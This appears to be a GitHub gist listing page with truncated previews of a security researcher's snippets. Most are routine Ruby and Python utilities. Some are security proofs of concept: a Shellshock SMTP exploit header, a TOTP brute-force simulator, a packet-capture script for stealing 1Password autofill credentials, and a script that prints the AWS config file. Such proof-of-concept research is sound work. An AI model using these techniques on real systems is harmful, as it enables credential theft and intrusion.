Jonathan Claudius claudijd

🦬
View GitHub Profile
@claudijd
claudijd / example5.rb
Created Jun 28, 2013
Ruby OpenSSL using verify peer and system cert store.
>> require 'socket'
=> true
>> require 'openssl'
=> true
>>
?> ssl_context = OpenSSL::SSL::SSLContext.new
=> #<OpenSSL::SSL::SSLContext:0x007ffc9a9deb00>
>> ssl_context.verify_mode = OpenSSL::SSL::VERIFY_PEER
=> 1
>> cert_store = OpenSSL::X509::Store.new
claudijd / poc.py
Last active Oct 30, 2021
Example method to obtain a bearer token and obtain a user's UUID
import json
import requests
import pdb
import os
BASE_URL = "https://auth.mozilla.auth0.com"
def get_bearer_token():
url = BASE_URL + '/oauth/token'
claudijd / totp_bruteforce_simulator.rb
Last active Aug 23, 2021
TOTP Bruteforce Simulation Code ("How practical is TOTP bruteforcing?")
# A proof of concept to demonstrate TOTP bruteforcing concepts
# Parameters to control simulation behavior###
request_rate = 4
totp_validity_window = 90 #in seconds
totp_guesses_per_auth_session = request_rate * totp_validity_window # number of totp guesses per auth session
simulated_logins = 100 # number of simulated logins to help determine average rate of TOTP collision
##############################################
# Helper Methods
claudijd / exploit.py
Last active Aug 7, 2021
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
View hello.py
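# Dump the local AWS CLI config file to stdout, one line per print() call.
# NOTE(review): ~/.aws/config can carry role ARNs, SSO settings and, in some
# setups, access keys -- treat the output as sensitive wherever stdout is
# captured or logged.
with open("/Users/jclaudius/.aws/config", "r") as log:
    # The context manager closes the handle even if iteration raises; the
    # original left the file open until interpreter exit.
    for line in log:
        # Each line keeps its trailing newline, so print() emits a blank line
        # after every entry, exactly as the original did.
        print(line)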
View clean_downloads.py
import glob
import os
import os.path
import shutil
mydir = "/Users/jclaudius/Downloads/"
filelist = glob.glob(os.path.join(mydir, "*"))
for f in filelist:
if os.path.isdir(f):
View clean_desktop.py
import os
import shutil
path = "/Users/jclaudius/Desktop/"
moveto = "/Users/jclaudius/Desktop/Archive/"
files = os.listdir(path)
files.sort()
for f in files:
if not os.path.isdir(f):
src = path+f
claudijd / example.py
Created Nov 15, 2019
boto => boto3 file upload
# In boto
import boto
conn = boto.connect_s3(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key)
bucket = conn.get_bucket(bucket_name, validate=False)
key = boto.s3.key.Key(bucket)
key.key = key_name
key.set_contents_from_filename(file_path)
url = "https://{}.s3.amazonaws.com/{}".format(bucket.name, key.name)
claudijd / steal_1password_creds.rb
Last active Oct 10, 2019
Steal 1Password credentials from browser auto-fill PoC
# Path setting slight of hand:
$: << File.expand_path("../../lib", __FILE__)
require 'packetfu'
require 'json'
capture_thread = Thread.new do
cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
cap.stream.each do |p|
pkt = PacketFu::Packet.parse p
if pkt.payload.include?("executeFillScript")
View poc.py
import re
# Current
>>> re.search(r"((ssh|https)://)?(git@)?github.com[:/](?P<repo_name>[A-Za-z0-9\/\-_]+)(.git)?", "bananas://github.com:/")
'/'
# Proposed
>>> re.search(r"^((https|ssh)://)?(git@)?github.com/(?P<repo_name>[A-Za-z0-9\/\-_]+)(.git)?$", "https://github.com/org/foo").group("repo_name")
'org/foo'
>>> re.search(r"^((https|ssh)://)?(git@)?github.com/(?P<repo_name>[A-Za-z0-9\/\-_]+)(.git)?$", "https://github.com/org/foo.git").group("repo_name")